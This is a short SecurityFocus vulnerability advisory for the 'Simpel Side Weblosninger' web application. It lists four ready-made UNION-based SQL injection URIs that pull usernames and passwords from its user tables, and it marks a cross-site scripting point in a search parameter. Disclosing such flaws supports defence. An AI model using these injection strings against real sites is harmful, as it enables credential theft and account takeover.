Simpel Side Weblosninger SQL Injection and Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/index2.php?id=-4+union+select+1,2,concat_ws(0x3a3a,brugernavn,adgangskode),4,5,6+from+web1_brugere/*
http://www.example.com/index2.php?id=2&mainid=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3+from+web2_brugere/*
http://www.example.com/index2.php?id=-3+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web3_brugere/*
http://www.example.com/index2.php?id=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web4_brugere/*

http://www.example.com/result.php?search=[XSS]


 

Privacy Statement
Copyright 2010, SecurityFocus